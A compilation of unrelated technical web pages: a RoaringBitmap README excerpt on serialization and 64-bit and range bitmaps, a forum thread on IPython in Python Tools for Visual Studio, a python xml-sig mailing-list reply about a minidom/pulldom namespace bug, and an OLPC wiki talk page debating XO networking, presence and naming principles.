ImmutableRoaringBitmap rrback2 = new ImmutableRoaringBitmap(bb);

Alternatively, we can serialize directly to a ByteBuffer with the serialize(ByteBuffer) method. Operations on an ImmutableRoaringBitmap such as and, or, xor, flip, will generate a RoaringBitmap which lies in RAM. As the name suggests, the ImmutableRoaringBitmap itself cannot be modified. This design was inspired by Druid. One can find a complete working example in the test file TestMemoryMapping.java. Note that you should not mix the classes from the org.roaringbitmap package with the classes from the org.roaringbitmap.buffer package. They are incompatible. They serialize to the same output, however. The performance of the code in the org.roaringbitmap package is generally superior because there is no overhead due to the use of ByteBuffer instances.

Kryo

Many applications use Kryo for serialization/deserialization. One can use Roaring bitmaps with Kryo efficiently thanks to a custom serializer (Kryo 5):

public class RoaringSerializer extends Serializer<RoaringBitmap> {
    @Override
    public void write(Kryo kryo, Output output, RoaringBitmap bitmap) {
        try {
            bitmap.serialize(new KryoDataOutput(output));
        } catch (IOException e) {
            e.printStackTrace();
            throw new RuntimeException();
        }
    }

    @Override
    public RoaringBitmap read(Kryo kryo, Input input, Class<? extends RoaringBitmap> type) {
        RoaringBitmap bitmap = new RoaringBitmap();
        try {
            bitmap.deserialize(new KryoDataInput(input));
        } catch (IOException e) {
            e.printStackTrace();
            throw new RuntimeException();
        }
        return bitmap;
    }
}

64-bit integers (long)

Though Roaring Bitmaps were designed with the 32-bit case in mind, we have extensions to 64-bit integers. We offer two classes for this purpose: Roaring64NavigableMap and Roaring64Bitmap. The Roaring64NavigableMap relies on a conventional red-black tree. The keys are 32-bit integers representing the most significant 32 bits of elements, whereas the values of the tree are 32-bit Roaring bitmaps. The 32-bit Roaring bitmaps represent the least significant bits of a set of elements. The newer Roaring64Bitmap approach relies on the ART data structure to hold the key/value pair. The key is made of the most significant 48 bits of elements, whereas the values are 16-bit Roaring containers. It is inspired by The Adaptive Radix Tree: ARTful Indexing for Main-Memory Databases by Leis et al. (ICDE '13).

import org.roaringbitmap.longlong.*;

// first Roaring64NavigableMap
LongBitmapDataProvider r = Roaring64NavigableMap.bitmapOf(1,2,100,1000);
r.addLong(1234);
System.out.println(r.contains(1)); // true
System.out.println(r.contains(3)); // false
LongIterator i = r.getLongIterator();
while(i.hasNext()) System.out.println(i.next());

// second Roaring64Bitmap
Roaring64Bitmap bitmap1 = new Roaring64Bitmap();
Roaring64Bitmap bitmap2 = new Roaring64Bitmap();
int k = 1 << 16;
long i = Long.MAX_VALUE / 2;
long base = i;
for (; i < base + 10000; ++i) {
    bitmap1.add(i * k);
    bitmap2.add(i * k);
}
bitmap1.and(bitmap2);

Range Bitmaps

RangeBitmap is a succinct data structure supporting range queries. Each value added to the bitmap is associated with an incremental identifier, and queries produce a RoaringBitmap of the identifiers associated with values that satisfy the query.
Every value added to the bitmap is stored separately, so that if a value is added twice, it will be stored twice, and if that value is less than some threshold, there will be at least two integers in the resultant RoaringBitmap. It is more efficient - in terms of both time and space - to provide a maximum value. If you don't know the maximum value, provide Long.MAX_VALUE. Unsigned order is used like elsewhere in the library.

var appender = RangeBitmap.appender(1_000_000);
appender.add(1L);
appender.add(1L);
appender.add(100_000L);
RangeBitmap bitmap = appender.build();
RoaringBitmap lessThan5 = bitmap.lt(5); // {0,1}
RoaringBitmap greaterThanOrEqualTo1 = bitmap.gte(1); // {0, 1, 2}
RoaringBitmap greaterThan1 = bitmap.gt(1); // {2}

RangeBitmap can be written to disk and memory mapped:

var appender = RangeBitmap.appender(1_000_000);
appender.add(1L);
appender.add(1L);
appender.add(100_000L);
ByteBuffer buffer = mapBuffer(appender.serializedSizeInBytes());
appender.serialize(buffer);
RangeBitmap bitmap = RangeBitmap.map(buffer);

The serialization format uses little endian byte order.

Prerequisites

- Version 0.7.x requires JDK 8 or better
- Version 0.6.x requires JDK 7 or better
- Version 0.5.x requires JDK 6 or better

To build the project you need maven (version 3).

Download

You can download releases from github:

Maven repository

If your project depends on roaring, you can specify the dependency in the Maven "pom.xml" file:

<dependencies>
  <dependency>
    <groupId>org.roaringbitmap</groupId>
    <artifactId>RoaringBitmap</artifactId>
    <version>0.9.9</version>
  </dependency>
</dependencies>

where you should replace the version number by the version you require. For up-to-date releases, we recommend configuring maven and gradle to depend on the Jitpack repository.
Usage

Get java

- ./gradlew assemble will compile
- ./gradlew build will compile and run the unit tests
- ./gradlew test will run the tests
- ./gradlew :roaringbitmap:test --tests TestIterators.testIndexIterator4 will run just the test TestIterators.testIndexIterator4
- ./gradlew checkstyleMain will check that you abide by the code style and that the code compiles.

We enforce a strict style so that there is no debate as to the proper way to format the code.

IntelliJ and Eclipse

If you plan to contribute to RoaringBitmap, you can load it up in your favorite IDE.

- For IntelliJ: in the IDE, create a new project, possibly from existing sources, choose import, gradle.
- For Eclipse: File, Import, Existing Gradle Projects, Select RoaringBitmap on my disk

Contributing

Contributions are invited. We enforce the Google Java style. Please run ./gradlew checkstyleMain on your code before submitting a patch.

- I am getting an error about a bad cookie. What is this about? In the serialized files, part of the first 4 bytes are dedicated to a "cookie" which serves to indicate the file format. If you try to deserialize or map a bitmap from data that has an unrecognized "cookie", the code will abort the process and report an error. This problem will occur to all users who serialized Roaring bitmaps using versions prior to 0.4.x as they upgrade to version 0.4.x or better. These users need to refresh their serialized bitmaps.

- How big can a Roaring bitmap get? Given N integers in [0,x), the serialized size in bytes of a Roaring bitmap should never exceed this bound:

8 + 9 * ((long)x + 65535) / 65536 + 2 * N

That is, given a fixed overhead for the universe size (x), Roaring bitmaps never use more than 2 bytes per integer. You can call RoaringBitmap.maximumSerializedSize for a more precise estimate.

- What is the worst case scenario for Roaring bitmaps? There is no such thing as a data structure that is always ideal. You should make sure that Roaring bitmaps fit your application profile.
There are at least two cases where Roaring bitmaps can be easily replaced by superior alternatives compression-wise:

- You have few random values spanning a large interval (i.e., you have a very sparse set). For example, take the set 0, 65536, 131072, 196608, 262144 ... If this is typical of your application, you might consider using a HashSet or a simple sorted array.

- You have a dense set of random values that never form runs of continuous values. For example, consider the set 0,2,4,...,10000. If this is typical of your application, you might be better served with a conventional bitset (e.g., Java's BitSet class).

How do I select an element at random?

Random random = new Random();
bitmap.select(random.nextInt(bitmap.getCardinality()));

Benchmark

To run JMH benchmarks, use the following command:

$ ./gradlew jmhJar

You can also run specific benchmarks...

$ ./jmh/run.sh 'org.roaringbitmap.aggregation.and.identical.*'

Mailing list/discussion group

Funding

This work was supported by NSERC grant number 26143.

*Note that all licence references and agreements mentioned in the RoaringBitmap README section above are relevant to that project's source code only.
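To get a feel for the serialized-size bound quoted in the FAQ above, here is a small Python sketch (the helper name is my own) that evaluates the formula, using integer division as in the original Java expression:

```python
def roaring_max_serialized_bytes(x, n):
    """Upper bound from the FAQ: 8 + 9*((x + 65535) // 65536) + 2*N,
    for N integers drawn from the universe [0, x)."""
    return 8 + 9 * ((x + 65535) // 65536) + 2 * n

# One 64K chunk, 100 values: 8 + 9*1 + 200 bytes.
print(roaring_max_serialized_bytes(65536, 100))   # 217

# Beyond the fixed per-universe overhead, the cost is exactly 2 bytes per integer:
x, n = 1 << 20, 10_000
fixed = 8 + 9 * ((x + 65535) // 65536)
assert roaring_max_serialized_bytes(x, n) - fixed == 2 * n
```

The `(x + 65535) // 65536` term is just the number of 65536-value chunks needed to cover the universe, which matches Roaring's container granularity.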
https://java.libhunt.com/roaringbitmap-alternatives
CodePlex Project Hosting for Open Source Software

I tried setting the interactive mode to IPython, but I get the following error when running a program via Execute in PI: Error using selected REPL back-end: IPython mode requires IPython 0.11 or later. Using standard backend instead AFAIK the latest stable version of IPython is 0.10.2. What am I missing? Do we have to use the dev branch? Thanks! Yes, you have to use the dev branch. Ah, that's unfortunate, as .11 breaks PythonXY's shell extension. I configured a separate CPython 2.6 installation (using virtualenv) and installed the latest version of IPython, but I am still having issues getting PTVS to work with it. After configuring a new python interpreter in VS and copying the settings from the default (except the location, of course), I tried running this script: import IPython print "IPython version is " + IPython.__version__ The result in the interactive window is: Running C:\Users\kyon\documents\visual studio 2010\Projects\IPythonEmbedTest\IPythonEmbedTest\Program.py Error using selected REPL back-end: IPython mode requires IPython 0.11 or later. Using standard backend instead IPython version is 0.11.dev It seems the python interpreter being invoked is using IPython 0.11.dev, but PTVS is still not accepting it. Any ideas? As an aside, I was able to generate exceptions and even crash VS by adding/removing interpreters in Tools->Options->Python Tools->Interactive <...>. In particular:

- If I add and then delete an interpreter in interpreter options, it will still show up in interactive windows until VS is restarted. Selecting it gives a KeyNotFoundException, full stack trace below.
- If I type "2.6" (no quotes) into the language version box I get a warning box saying "version is not in invalid format and will not be updated", but 2.6 is what is entered for the default interpreter.
- If I add a new interpreter in options, I cannot set its interactive mode unless the Options window is reopened.
Doing so still causes the exception shown below, until VS is restarted. - Adding and deleting interpreters caused VS to crash at one point, wasn't able to reproduce it.

System.Collections.Generic.KeyNotFoundException: The given key was not present in the dictionary. at System.Collections.Generic.Dictionary`2.get_Item(TKey key) at Microsoft.PythonTools.Options.PythonInteractiveOptionsControl.get_CurrentOptions() at Microsoft.PythonTools.Options.PythonInteractiveOptionsControl.RefreshOptions() at Microsoft.PythonTools.Options.PythonInteractiveOptionsControl._showSettingsFor

I installed the IPython 0.11 release version and configured interactive mode to "IPython" and am getting the same error as kyon: Am I doing something wrong? I can import IPython and assert its version from that very same interactive window: >>> import IPython >>> IPython.__version__ '0.11' This is usually caused by not having ZeroMQ installed (IPython uses zmq for its communication, but it's not required for just the basic IPython experience - only if someone is hosting IPython). If you have easy_install you can just do an easy_install.exe pyzmq and it should work. If that's not the issue I can tell you how to make it print the exception which is preventing IPython from loading - we should probably do that by default instead of hiding it. I'm trying to install pyzmq but it complains that it cannot find the ZMQ directory. Do I need to first build and install ZMQ before I easy_install pyzmq?
Here is the output I get:

>easy_install pyzmq
Searching for pyzmq
Reading
Reading
Reading
Best match: pyzmq 2.1.9
Downloading
Processing pyzmq-2.1.9.zip
Running pyzmq-2.1.9\setup.py -q bdist_egg --dist-dir c:\users\dfortu~1\appdata\local\temp\easy_install-x0rm3f\pyzmq-2.1.9\egg-dist-tmp-9i91gp
Fatal: ZMQ directory must be specified on Windows via setup.cfg or 'python setup.py configure --zmq=/path/to/zeromq2'
error: Setup script exited with 1

I'm not sure why that wouldn't work (maybe a bug in the setup script for zeromq?) I'd suggest trying the binary installers instead: Yeah, I held off on that because the latest version didn't have a binary distribution for python 2.6, but I've now installed a slightly older 'pyzmq-2.1.4.win32-py2.6.msi' and it all works fine. Thanks! Hi, I've just started using PTVS with IPython 0.11 and I'm getting the same error: I've installed pyzmq but that hasn't sorted it. Any other suggestions? Thanks. darwinian, Can you open a Python REPL and run: from IPython.zmq.kernelmanager import ShellSocketChannel, KernelManager, SubSocketChannel, StdInSocketChannel, HBSocketChannel And see what exceptions you get? Hi dinov, thanks for the reply. I ran the imports and... no errors at all. Could it have accidentally been in different REPLs - in other words did you try it from the VS repl or a normal CMD repl? It might be best to try it from the VS repl after you get the error just to make sure everything else is the same.
If it's the former, what versions of Python do you have installed and where did the distro come from (e.g. python.org, Enthought, ActiveState, etc...)? I mean IPython no longer appears under Tools->Options->Interactive Windows->Interactive Mode. The only option available is the standard Python 2.7 interactive window. I have the Enthought 7.1 free distribution installed. One possible solution is to paste visualstudio_ipython_repl.IPythonBackend into the text box (which is what IPython magically turns into). I'm not really sure what would cause this to go away; this should be registered in our .pkgdef file (in %LOCALAPPDATA%\Microsoft\VisualStudio\10.0\Extensions\Microsoft\Python Tools for Visual Studio\1.0\Microsoft.PythonTools.pkgdef if you did a per-user install, or in VsInstallDir\Common7\IDE\Extensions\Microsoft\Python Tools for Visual Studio\1.0\Microsoft.PythonTools.pkgdef for the default all-users install). This actually should always be there regardless of whether or not IPython is installed. Does that file still have:

[$RootKey$\PythonTools\ReplExecutionModes\{91BB0245-B2A9-47BF-8D76-DD428C6D8974}]
"Type"="visualstudio_ipython_repl.IPythonBackend"
"FriendlyName"="IPython"
"SupportsMultipleScopes"="False"

in it? I just encountered the same issue, and I found the following was the issue: in the <python>\Lib\site-packages\IPython\zmq\__init__.py file:

minimum_pyzmq_version = "2.1.4"

try:
    import zmq
except ImportError:
    raise ImportError("IPython.zmq requires pyzmq >= %s"%minimum_pyzmq_version)

pyzmq_version = "2.1.4" #zmq.__version__

if pyzmq_version < minimum_pyzmq_version:
    raise ImportError("IPython.zmq requires pyzmq >= %s, but you have %s"%(
        minimum_pyzmq_version, pyzmq_version))

the issue is that "2.1.10" < "2.1.4" when compared as strings; I hardcoded this to pass and now it works. Ciao

I had the same issues. I've installed pyzmq and did the version rename, but after entering a command into the VS REPL the process doesn't return (wait cursor).
I'm running Win7 x64, PyTools 1.1 alpha, VS2010 SP1 and a bunch of other extensions. Any hints? asqui wrote: Yeah, I held off on that because the latest version didn't have a binary distribution for python 2.6, but I've now installed a slightly older 'pyzmq-2.1.4.win32-py2.6.msi' and it all works fine. Thanks! I also had the same problem and getting that same pyzmq binary installer seems to have fixed it. I wasn't sure whether I should start a new thread or put it here. So I put it here. I've installed: PTVS 1.5 Beta 1.msi, python 2.7.3 win32, ipython 0.13 py2 win32, pyzmq 2.2.0 win32 (tried 2.1.4 too). When I launch a test file in the python interactive shell I get an error:

The Python REPL process has exited
Traceback (most recent call last):
  File "C:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\IDE\Extensions\Microsoft\Python Tools for Visual Studio\1.5\visualstudio_py_repl.py", line 1092, in <module>
    _run_repl()
  File "C:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\IDE\Extensions\Microsoft\Python Tools for Visual Studio\1.5\visualstudio_py_repl.py", line 1076, in _run_repl
    BACKEND = backend_type(launch_file=options.launch_file)
  File "C:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\IDE\Extensions\Microsoft\Python Tools for Visual Studio\1.5\visualstudio_ipython_repl.py", line 158, in __init__
    self.km.start_kernel(**{'ipython': True, 'extra_arguments': self.get_extra_arguments()})
  File "D:\Tools\Python\Python27_86\lib\site-packages\IPython\zmq\kernelmanager.py", line 806, in start_kernel
    self.kernel = launch_kernel(fname=self.connection_file, **kw)
  File "D:\Tools\Python\Python27_86\lib\site-packages\IPython\zmq\ipkernel.py", line 869, in launch_kernel
    *args, **kwargs)
TypeError: base_launch_kernel() got an unexpected keyword argument 'ipython'

UPDATE: Have tried PTVS 1.1.1 with no luck too.

Tiphon, Sorry for the slow response time - this looks like a breaking change in IPython .13.
To work around this you can remove "'ipython': True," from "C:\Program Files (x86)\Microsoft Visual Studio 10.0\Common7\IDE\Extensions\Microsoft\Python Tools for Visual Studio\1.5\visualstudio_ipython_repl.py" on line 158. I've pinged the IPython team and opened an issue so that we can fix this and support IPython .11 - .13 at the same time.
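The root cause that the thread keeps running into is that comparing version strings lexicographically gives the wrong answer once a component reaches two digits. A small sketch of the pitfall and the usual fix (splitting into integer tuples; the helper name is my own):

```python
# Lexicographic string comparison misorders multi-digit components:
# "2.1.10" sorts before "2.1.4" because '1' < '4' character-wise.
assert ("2.1.10" < "2.1.4") is True

def version_tuple(v):
    """Convert a dotted numeric version string into a comparable tuple."""
    return tuple(int(part) for part in v.split("."))

# Tuple comparison gets it right: 2.1.10 really is newer than 2.1.4.
assert version_tuple("2.1.10") > version_tuple("2.1.4")
assert version_tuple("2.1.4") >= version_tuple("2.1.4")
```

In modern code one would typically reach for packaging.version.parse instead, which also handles pre-release suffixes that a plain int() split would choke on.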
http://pytools.codeplex.com/discussions/254221
On Fri, 2004-09-10 at 04:51, Ajay wrote: > Quoting Uche Ogbuji <uche.ogbuji at fourthought.com>: > > > On Wed, 2004-09-08 at 22:34, Ajay wrote: > > > hi! > > > > > > > > > Quoting Alan Kennedy <alanmk at hotmail.com>: > > > > > > > [Ajay] > > > > > i have tried the archives now and heaps of Google searches but am > > no > > > > closer > > > > > to finding out what the error is. > > > > > > > > > > the error does not appear if i use expat. > > > > > > > > and > > > > > > > > >>i am parsing the attached document. > > > > >>the code is > > > > >>parser = make_parser('xml.sax.drivers2.drv_xmlproc') > > > > >>ruleSet = parse(ruleSetFile, parser=parser) > > > > You've got some odd code here. The following works for me (no errors): > > > > >>> from xml.sax import make_parser > > >>> parser = make_parser('xml.sax.drivers2.drv_xmlproc') > > >>> ruleSet = parser.parse("foo.xml") > > > > Where "foo.xml" is the file I pasted in from your message. > > i should have put my import statements. i am actually trying to use minidom > with xmlproc. thus the code really is > from xml.dom.minidom import parse > from xml.sax import make_parser > > parser=make_parser('xml.sax.drivers2.drv_xmlproc') > ruleSet = parse('foo.xml', parser=parser) > > this throws the error i described earlier for the document which i also > posted earlier. > > so what am i doing wrong? I don't think you're doing anything especially wrong. This looks like a bug in pulldom. Seems as though it can't handle "global" attributes when fed from parsers that don't report namespace prefix mappings. IOW, <p3p:PURPOSE appel: ^^^^^^ breaks in this case. This will probably require some work in PullDOM to address :-( Man, you seem to have the worst luck here. -- -
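For context, the failing document used namespace-qualified ("global") attributes like appel:connective, which is exactly the construct pulldom choked on when driven by a parser that doesn't report prefix mappings. With the default expat-based builder, today's stdlib minidom resolves such attributes fine; a minimal sketch (the namespace URI and attribute are invented for illustration):

```python
from xml.dom.minidom import parseString

# A "global" (namespace-prefixed) attribute, analogous to the
# appel:connective attribute in the document that triggered the bug.
doc = parseString(
    '<RULESET xmlns:appel="http://example.org/appel"'
    ' appel:connective="and"><RULE/></RULESET>'
)
root = doc.documentElement

# Lookup by qualified name works...
print(root.getAttribute("appel:connective"))  # -> and
# ...and so does namespace-aware lookup, since expat reports prefix mappings.
print(root.getAttributeNS("http://example.org/appel", "connective"))
```

The failure described in the thread came from feeding pulldom a SAX driver (xmlproc) that never emitted the prefix-mapping events, so the "appel" prefix could not be resolved to a namespace URI.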
https://mail.python.org/pipermail/xml-sig/2004-September/010589.html
Talk:Network principles

I think it is very important to emphasize that relying on IPv4 or IPv6 routability means that deployments can improve network conditions independently of changes to the software on the XO. --Michael Stone 15:47, 28 April 2008 (EDT)

"fake friends" == "strangers"?

I believe that the term "strangers" better describes what you mean by "fake friends"; the latter incorporates a sense of "deception" where someone pretends to be a friend. Instead, you probably refer to users that happen to be physically around, and I would assume those to be plain strangers, unless otherwise decided by the user. --Ypod 00:26, 29 April 2008 (EDT)

- You're totally right. The only problem with "strangers" is that it doesn't quite capture the idea that these may be people you know, they're just not guaranteed to be. But "strangers" is much better than "fake friends"; I've made the change. CScott 12:22, 9 May 2008 (EDT)

First comments from Ben

Network Principles: "Additional servers may be used as aides or proxies, but the fundamental means to query the state of an XO or to collaborate with its user is to directly connect to it." What does "fundamental" mean? Perhaps you mean "most direct"?

- I've changed it to "canonical". Other means are optimizations only; they don't need to work. CScott 12:22, 9 May 2008 (EDT)

"By direct communication we mean the standard socket API and IP protocols on which the internet is built." You seem to be implying that the standard protocols are preferred, but mesh multicast (especially cerebro's implementation) is a clear example in which the standard protocols are not preferred.

- Again, mesh multicast should be viewed as an optimization, not a core feature. Everything should work (albeit at reduced efficiency) even without such tricks. Mesh multicast doesn't actually work across the broader internet, so it's not a good primitive on which to base the design.
("Standard" multicast also doesn't really work across the broader internet -- at least not w/o manual configuration.) CScott 12:22, 9 May 2008 (EDT)

Direct presence interrogation: "The fundamental presence mechanism is direct: one XO connects directly to a service running on the other and queries for its status" Again, I think you want "simplest", as your subsequent algorithm makes clear that this is not the recommended method (piggybacking and lazy presence being preferred, and active interrogation being used only when presence info times out).

- "canonical", again. Other mechanisms are optimizations. Sure, use an optimization if you can, but you should be able to work w/o them. CScott 12:22, 9 May 2008 (EDT)

"most users have 20 or so friends" I have about 200 buddies on my AIM buddy list. I glanced through my friends on facebook; they often have 600-900 friends (at 98, I am considered an ultraminimalist). Facebook provides constant high-bandwidth presence for all of them, which is only possible due to its centralized, lazy, aggregating architecture. On myspace, the numbers run into the many thousands. We should expect users to behave similarly with our presence service. We should also remember that the presence service bandwidth will only increase, due to strongly desired features like photo buddy icons and live previews of shared activities. The bandwidth will be much lower than Facebook's, but also much larger than the current Presence Service.

"The key point is that all hosts should support direct interrogation for presence, even if other efficient mechanisms are used for partial aggregate presence in some situations." OK, though I think you have your emphasis backwards.

- "Premature optimization is the root of all evil", etc, etc. Many of our networking scenarios don't actually need heroic measures. CScott 12:22, 9 May 2008 (EDT)

"Our principles above dictate that collaboration mechanisms are built using direct peer-to-peer communication." Umm...
except in the case of talking to a user in Google Chat, or any other legacy IM tunneled over Jabber. Now you're using peer-to-peer to mean client-to-server, just like you were complaining about before. Also, "principles" sounds like this is a moral issue; it's not. Finally, what about a wiki?

- "Principles" is meant to suggest these are not absolute rules, but rather guidelines (ie, that it's not a moral issue). Communicating with non-XOs is at the mercy of the legacy bits, I can't force Google Chat to decentralize. Wikis are really interesting cases. MikMik is an example of a true peer-to-peer wiki, consistent with this document's recommendations. Note that, as this document recommends, it *can* use a server to help it scale, but doesn't *need* a server. CScott 12:22, 9 May 2008 (EDT)

"Friends are represented internally using the domain name only; there is no "user@" portion." This would make it impossible to be friends with someone on Google Chat. There is no need for this restriction. The domain name can only be "unnecessary" if the user name happens to be "xo", and I hardly see the value of saving 3 characters ("xo@") in an internal representation. Ben 00:30, 29 April 2008 (EDT)

Friending (Poly)

Scott wrote: ." I think there is a distinct difference between "friending" in the context of social networking sites (facebook, myspace) and the network created by the XOs: the former by definition urges users to increase their social connectivity by adding new "friends", whereas the latter does not provide a "friend" recommendation mechanism and there is no third party (like facebook) that facilitates fast "friending" growth. As a result, friending done using the XOs might be a better representation of the actual friend networks among children, with relatively fewer edges.

- My point is, Facebook actually _does_ represent an accurate model of friend networks, because most people really do know over 1000 other people well enough to want to know what they're doing.
Also, IM is a closer analogy to friending in Sugar, and the number of people on AIM buddy lists is often in hundreds as well. This is despite the fact that adding someone in your buddy list requires typing in a unique textual identifier (their screen name), and the system provides no discovery mechanism. This is even true on ICQ, where the unique identifier is not human-readable. If our discovery mechanisms are nonexistent, we can expect users to have dozens of friends. If our discovery mechanisms are good, we can expect hundreds. Ben 10:34, 29 April 2008 (EDT)

However, I still think that relying on the fact that a child will have few friends so as not to overload the network with presence queries is a sub-optimal approach, not only because children may actually end up having as many "friends" as they would on Facebook, but also because maintaining up-to-date information only about your friends and having no information (what their profile is, what activities they're sharing) about "strangers" will be boring. If you actually have such information about strangers (assuming that no internet connection/xmpp server is available), then why do you need to query your friends on a different basis? Again, I will elaborate more on this on a separate stub.

In response to Ben's comment: . I think your concern of services corresponding to well-known ports is valid. I would like to generalize the problem though to the case where activities need to be identified and need to communicate from one XO to another: How do activities get identified? By some unique (per activity) id? By some string name? I will write my thoughts on this on a separate stub. --Ypod 01:24, 29 April 2008 (EDT)

On Presence updates/User Profiles/Collaboration

On_Presence_updates/User_Profiles/Collaboration --Ypod 03:37, 29 April 2008 (EDT)

Anything unique to a communications path (e.g., the mesh)?
Reading the topic 'Direct XO-to-XO peer communication', I saw that you are NOT making any distinction among the paths (e.g., direct mesh vs. through school relay_server vs through internet) used to access the other XO. The target XO either is present, or is not. If the target XO can be reached via multiple routes, a suitable one will be chosen. Aside from those "under the covers" protocols which handle the mesh communication itself, is there any need for Activities (or Users) to be cognizant that they are interacting over the "mesh" rather than the "internet"? [And apart from a possible role in "discovering" the names of potential correspondents, is the 'Jabber server' needed any more?]

Daf's thoughts

- I agree with Ypod's suggestion of saying "strangers" rather than "fake friends".
- Things I like:
 - Maintaining a distinction between OLPC and deployment responsibilities.
 - The separation of discovery, presence and collaboration, and the acknowledgement that protocols sometimes do discovery and presence simultaneously.
- "Human-readable names promote compatibility with other network hosts". I don't understand this phrase.
 - I've edited this paragraph. I'm talking about interoperation with non-XOs and with legacy software on an XO.
- We should say why we want names to be concise. Is it so that they can be typed in? So that they don't take a lot of bandwidth when transmitted?
- I'm not convinced by the "logical" part. If we really want names to encode particular information (name, country, school etc.) then we should say up front that the name should encode that information in the principles document. I think "meaningful" is a better name than "logical" for this property.
- I think it's more clearly desirable that names are memorable. By "memorable", I mean something like: having seen the name, one can later input it from memory.
- Even allowing the name part to be input/displayed as unicode rather than punycode, I don't think the proposed DNS scheme will be memorable due to the inclusion of the key hash. I don't think it will be particularly concise.
- Zooko's triangle applies; I think it's worth citing it. We already acknowledge that picking secure/meaningful implies centralisation.
 - Yes, I cited it; no, centralization is not necessary. I provide an option: use centralized delegation of namespace to schoolservers to allow localized uniqueness checks; or else use "enough" randomness in the name chosen to ensure decentralized probabilistic uniqueness. We recommend that schoolservers be "centrally" given good names, which makes our names more "memorable". CScott 12:39, 9 May 2008 (EDT)
- "By direct communication we mean the standard socket API and IP protocols on which the internet is built." When we say "IP protocols", are we talking about IPv4 and IPv6, or TCP and UDP, or application protocols?
 - I more-or-less mean that an application should be able to use the standard IPv4/IPv6 socket API and get something that works. We will, of course, build higher-layer abstractions on top of that, but you shouldn't *need* to use the abstractions in order to connect to an XO. Help clarifying the wording is welcome. CScott 12:39, 9 May 2008 (EDT)
- "Our principles above dictate that collaboration mechanisms are built using direct peer-to-peer communication." I don't understand which principles this statement follows from.
- "To manage this case, we strictly limit the rate and size of presence queries." Have we considered also limiting the number of strangers we try to talk to? If we try to poll everybody possible, then the poll interval for each contact becomes long.
 - I considered this, but I think slowing down is vastly preferable to selecting an arbitrary subset of the strangers. If I know I'm sitting next to someone, how do I guarantee I'll see that person in my subset?
The only reasonable subsetting mechanism I can think of is tied to distance: if my friend doesn't show up, I just need to move closer to them. That seems reasonably intuitive -- but the distance metrics we get from the RF hardware bear a poor relationship to real-world distances, so the intuition breaks down. CScott 12:39, 9 May 2008 (EDT)

- This is a problem that troubled me a lot in the past: long delays vs. presence of large numbers of nodes. First I think we should do our best by minimizing the cost of adding information about more nodes. At the very least it should have a linear cost, and each node should account for a minimal cost (forget about colors, nicks, etc). I agree that distance is the first way to filter out nodes once we reach a limit in delays. What is more interesting though, would be to give our users the ability to make their own budget on the timeshare they have available. If we hit an upper limit at 500 nodes for example, we should allow the user to make a presence budget like:
 - 400 nodes: choose the shortest physical distance
 - 80 nodes: choose any of my friends (starting from the closest ones), irrespective of distance
 - 20 nodes: choose any of my friends' friends (two hops in social distance)
- I envision that in the long run much of the social network rules ("I hate this guy" etc) should be imposed on the mesh network itself. --Ypod 17:22, 12 May 2008 (EDT)

- "There are three main ways in which direct XO-to-XO communication fails". I think this is better stated as two ways: because a NAT is present, or because a firewall is present. NATs block inbound connections as a (desired or undesired) side-effect of the job they perform. Blocking of connections by a firewall is not a side-effect but by design. Many NATs provide (standard or de facto standard) means of opening ports to the outside world, and we should consider using these means so as to be able to help deployments where the use of a NAT is outside of their control.
Of course, if more than one person behind a NAT wishes to export the same service, then they need to use a different port, which necessitates some sort of out-of-band means of communicating that port. Also, actively communicating with NATs to negotiate port forwarding (as opposed to circumventing the NAT without its cooperation) tends to not work when there are multiple layers of NAT.

- Why are "Direct XO-to-XO peer communication" and "Direct presence interrogation" separate principles? The latter seems to me to be a subset of the former.
- I don't see a rationale for why communications should be direct. There are lots of reasons why we might want to communicate directly, but we should state which ones are important to us.
- "Although the name is a direct reference to the machine, the mapping from name to routable address is indirect." I find this statement very confusing. It's making some distinction between direct and indirect that I can't fathom. The statement "The key property is that there is a single name by which anyone anywhere on the network uses to refer to a particular XO -- the names do not depend on the means by which the name is mapped to an address, route or service" later in the same paragraph is quite clear, but I don't understand its connection to the direct/indirect distinction.
- The architecture proposal doesn't describe a presence interrogation mechanism.
- We should consider having a push mechanism as well as a pull mechanism. This saves unnecessary presence polls. A simple way to do this would be to maintain a connection to everybody you want presence notifications from. Presence notifications can be rate-limited on the sending side. Assuming the overhead of maintaining a connection is low, it shouldn't be any more expensive than polling. This is somewhat similar to how Jabber servers implement presence updates.
 - Yes, this is (part of) how an on-laptop XMPP server would work.
I'll describe this more fully after I've proof-of-concept-implemented it. CScott 12:39, 9 May 2008 (EDT)

- I disagree with maintaining long-lived connections. The cost of a single connection may be low, but having tens or hundreds of them may impose significant overhead. Not to mention the cost of re-establishing TCP connections (did you have TCP in mind?) in a mobile mesh network. I do agree though that there should also be a push mechanism, but I see no reason why it should be connection-based. --Ypod 17:37, 12 May 2008 (EDT)

— Daf 18:30, 7 May 2008 (EDT)

- What about centrally defined groups - e.g. created by a teacher? How could those be created, and updated? Does that require a server, or can we do it with xmpp: links?
 - The relevant XMPP spec has a way to add a friend in a certain group, but omits mention of creating a group with multiple friends at once. At the moment, I'd say the scope of this proposal is primarily concerned with defining how these buddies are represented; centrally-managed groups have been discussed via Moodle and a Jabber Server, and both seem to be reasonable. CScott 17:03, 22 November 2008 (UTC)
- With rate-limited presence updates on the scale proposed, I think showing the active activity in mesh view becomes less useful as it becomes less accurate. This clustering around the active shared activity was part of the original design, according to Eben.
 - If the network has capacity, the rate-limiting won't be visible. This proposal is primarily about separating out the pieces so that collaboration and presence can be implemented and improved separately, and so failure or degradation in the presence service doesn't prevent collaboration. CScott 17:03, 22 November 2008 (UTC)
- "xo@" -- not to optimise prematurely, but what about non-XO Sugar instances? While I can't quickly think of an alternative short name, something more generic than "xo" might be more appropriate.
 - I chose 'xo' primarily because it was short and semi-meaningful.
I'm not terribly attached to it. Non-XO instances should be free to use 'sugar@' or 'fedora@' or 'classmate@' (but their users will have to type a bit more) or just 'a@'; it shouldn't matter at all to interop. If someone can think of an alternative short pithy name, I'm all for it. CScott 17:03, 22 November 2008 (UTC)

--morgs 16:58, 12 May 2008 (EDT)

XO-to-XO security

+1 to this approach. Not only do I agree with an approach that resembles ssh as much as possible, but it also allows us to encapsulate traditional IP-based communication over a network where IP addresses were never assigned or used! This is very important for communication _within_ a mesh network. To explain this further, I could access by capturing all IP traffic locally and encapsulating it into frames that are routed using the underlying mesh routing protocol. If we're not going to use IP for routing within the mesh network while we are backwards compatible with IP-based applications, I no longer see a reason why we need IP addresses within the mesh (except maybe for the MPP that acts as an internet gateway) --Ypod 20:05, 28 June 2008 (UTC)

